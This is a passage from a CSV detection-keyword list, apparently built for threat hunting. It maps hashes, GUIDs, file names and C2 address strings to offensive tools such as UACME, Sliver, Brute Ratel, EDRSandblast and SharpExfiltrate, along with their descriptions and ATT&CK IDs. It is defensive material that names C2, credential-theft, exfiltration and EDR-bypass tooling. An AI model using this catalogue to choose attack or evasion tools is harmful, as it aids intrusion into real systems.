tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*192.168.0.110:1234*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*192.168.1.229 Passw0rd!*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*1939a69f717d4baa13d558c11e1fc7dee1e8ce8fcc5f0fe0dea11845e22ce4c8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*195a6712e204e1d01dc1d36b9d43a2a477b0833019294b37512d8baaa98e524e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*1a279f5df4103743b823ec2a6a08436fdf63fe30*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*1BACEDDC-CD87-41DC-948C-1C12F960BECB*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*1c50adeb-53ac-41b9-9c34-7045cffbae45*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*1C5EDA8C-D27F-44A4-A156-6F863477194D*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*1E70D62D-CC36-480F-82BB-E9593A759AF9*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*1mil-AD-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*1N3/Sn1per*","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/1N3/Sn1per","1","0","N/A","N/A","10","6905","1738","2023-09-29T22:14:24Z","2015-09-06T15:47:38Z" +"*1N73LL1G3NC3x/Nightmangle*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*1password2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2_lyncbrute.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*22A156EA-2623-45C7-8E50-E864D9FC44D3*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*23975ac9-f51c-443a-8318-db006fd83100*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*261f880e-4bee-428d-9f64-c29292002c19*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*29446C11-A1A5-47F6-B418-0D699C6C3339*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*2944dbfc-8a1e-4759-a8a2-e4568950601d*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*2D863D7A-A369-419C-B4B3-54BDB88B5816*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" +"*2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2john.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*365-Stealer.py*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*365-Stealer-master*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*36F9C306-5F45-4946-A259-610C05BD90DF*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*375D8508-F60D-4E24-9DF6-1E591D2FA474*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","0","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*3bb553cd-0a48-402d-9812-8daff60ac628*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*3BEF8A16-981F-4C65-8AE7-C612B46BE446*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3C601672-7389-42B2-B5C9-059846E1DA88*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*3kom-superhack.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*3snake-master*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*4.5.6.7:1337*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 